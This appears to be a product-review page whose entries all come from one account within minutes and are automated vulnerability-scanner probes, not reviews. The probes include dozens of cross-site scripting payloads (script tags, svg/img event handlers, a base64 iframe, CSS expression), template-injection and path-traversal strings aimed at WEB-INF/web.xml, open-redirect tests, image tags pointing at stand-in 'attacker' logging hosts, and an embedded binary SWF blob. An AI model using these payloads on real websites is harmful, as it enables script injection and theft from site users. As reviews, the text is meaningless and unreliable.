From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-907640/log.php?
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
979390
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(918251)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
WEB-INF/web.xml
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(971677)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
WEB-INF\web.xml
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
1_962277
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
acu7549<s1﹥s2ʺs3ʹuca7549
From: yebglfyh | Date: 4/15/2016 10:18 PM
Was this review helpful? Yes No (0/0)
Mr.
acux1392��z1��z2a�bcxuca1392
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
/www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
906642
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
http://www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
{{9999883*9999557}}
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(978847)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
//www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(950168)</script>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(929181)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(966603)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?904111></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
/\www.vulnweb.com
1
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(921434)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(999137)">
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(917957);>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(916043)%3E
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(998003)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(949158))>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='925580'>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(999729)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(915428)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(966913)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(904592)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(918554)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(975459)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(916690)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(960360) //�>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(921873)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(910895);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(906937))}
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(939273)>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1_p2XWI
<ScRiPt >prompt(936310)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=968429.com></IfRamE>
From: yebglfyh | Date: 4/15/2016 10:19 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-920339/log.php?
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1'"()&%<acx><ScRiPt >prompt(973838)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
'"()&%<acx><ScRiPt >prompt(953833)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1_914928
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
acu4102<s1﹥s2ʺs3ʹuca4102
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
acux10751��z1��z2a�bcxuca10751
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0  
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
{{10000414*10000437}}
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt >prompt(946256)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<script>prompt(920087)</script>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScR<ScRiPt>IpT>prompt(996505)</sCr<ScRiPt>IpT>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(926349)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950858></ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt
>prompt(976485)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<video><source onerror="javascript:prompt(930443)">
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<svg  

�onload=prompt(993400);>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1%3Csvg%20onload%3Dprompt(924360)%3E
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<isindex type=image src=1 onerror=prompt(975039)>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<div style=width:expression(prompt(995924))>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='948565'>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<body onload=prompt(901253)>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(968402)>
From: yebglfyh | Date: 4/15/2016 10:20 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img src=xyz OnErRor=prompt(997617)>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img/src=">" onerror=alert(986539)>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ScRiPt%20>prompt(996301)</sCripT>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1\u003CScRiPt\u003Eprompt(917153)\u003C/sCripT\u003E
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1&lt;ScRiPt&gt;prompt(922481)&lt;/sCripT&gt;
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
�<img acu onmouseover=prompt(995817) //�>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1<input autofocus onfocus=prompt(992939)>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=http://www.vulnweb.com></a>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
<a HrEF=jaVaScRiPT:>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
[url=http://www.vulnweb.com][/url]
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img<!-- --> src=x onerror=alert(906942);//><!-- -->
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1}body{acu:Expre/**/SSion(prompt(997186))}
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1<% contenteditable onresize=prompt(919560)>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1_JkpXv
<ScRiPt >prompt(916243)</ScRiPt>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1<ifRAme sRc=904831.com></IfRamE>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1<img sRc='http://attacker-949637/log.php?
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.'"()&%<acx><ScRiPt >prompt(962183)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
'"()&%<acx><ScRiPt >prompt(927127)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr._985601
1
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
acu5613<s1﹥s2ʺs3ʹuca5613
1
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
acux10534��z1��z2a�bcxuca10534
1
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
{{9999391*9999085}}
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.<ScRiPt >prompt(943504)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.<script>prompt(920717)</script>
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.<ScR<ScRiPt>IpT>prompt(904773)</sCr<ScRiPt>IpT>
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.<ScRiPt >prompt(940923)</ScRiPt>
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)